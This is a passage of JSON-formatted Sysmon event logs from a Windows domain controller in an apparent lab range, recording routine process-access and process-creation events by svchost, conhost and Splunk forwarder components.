C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4483,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4484,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4485,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4486,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4487,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4488,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:56.535\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1184-5F25-0000-0010BB320600}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:56.535","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1184-5F25-0000-0010BB320600}","TargetProcessId":"4976","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4489,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.208\r\nProcessGuid: {E2A3D6B1-1185-5F25-0000-001090340600}\r\nProcessId: 4584\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.208","ProcessGuid":"{E2A3D6B1-1185-5F25-0000-001090340600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:53:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4490,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.207\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1185-5F25-0000-001090340600}\r\nTargetProcessId: 4584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.207","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1185-5F25-0000-001090340600}","TargetProcessId":"4584","TargetImage":"C:\\Program 